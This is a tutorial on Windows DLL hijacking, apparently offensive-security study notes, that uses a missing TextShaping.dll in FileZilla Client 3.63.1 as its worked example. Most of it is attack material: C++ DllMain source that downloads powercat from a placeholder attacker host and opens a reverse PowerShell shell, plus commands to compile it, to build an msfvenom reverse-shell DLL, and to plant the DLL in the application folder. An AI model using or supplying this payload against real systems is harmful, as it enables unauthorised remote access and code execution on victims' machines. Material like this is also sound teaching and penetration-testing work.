Service DLL Hijacking

This attack is similar to "Service Binary Hijacking" but instead of replacing the executable, it targets a DLL the application relies on.

Another approach is hijacking the DLL search order, where Windows looks for the required DLLs in this sequence:

1. The directory from which the application loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory. 
5. The current directory.
6. Directories in the PATH environment variable.

Exploiting a Missing DLL

List applications on the machine:

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Do some research about an application which is vulnerable to DLL Hijacking.

The following example displays a Service which is vulnerable kind of this attack.

FileZilla Client 3.63.1 - 'TextShaping.dl' DLL HijackingExploit Database

FileZilla DLL Hijacking Exploit

In the example above, the application attempts to load a DLL, but fails to find it in its directory. Instead, TextShaping.dll loads from the System directory (2th in the search order).

The following screenshot is from Procmon, showing the application's attempt to load TextShaping.dll from the The directory from which the application loaded.

Procmon DLL attach failed

Attack Path

To exploit this, create a malicious DLL in the FileZilla directory so that when the application looks for the legitimate DLL, it loads the attacker’s version instead, executing malicious code.

Creating The DLL

Using C++ it is possible to create DLLMain function which is responsible to execute code in the DLL life cycle:

TextShaping.dll

#include <windows.h>
#include <string.h>

BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	system("powershell -c \"IEX (New-Object System.Net.Webclient).DownloadString('http://<attacker_ip>/powercat.ps1'); powercat -c <attacker_ip> -p <attacker_port> -e powershell\"");
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

Compile it:

x86_64-w64-mingw32-gcc TextShaping.cpp --shared -o TextShaping.dll

Alternatively, use msfvenom to generate the DLL:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o TextShaping.dll

Exploiting

Moving the DLL to the target directory:

iwr -uri http://<attacker_ip>/TextShaping.dll -OutFile 'C:\FileZilla\FileZilla FTP Client\TextShaping.dll'

Soon as the DLL will be attached the DLLMain function will execute.

References

Dynamic-link library search order - Win32 appsMicrosoftLearn

Dynamic-link library search order

Process Monitor - SysinternalsMicrosoftLearn

Process Monitor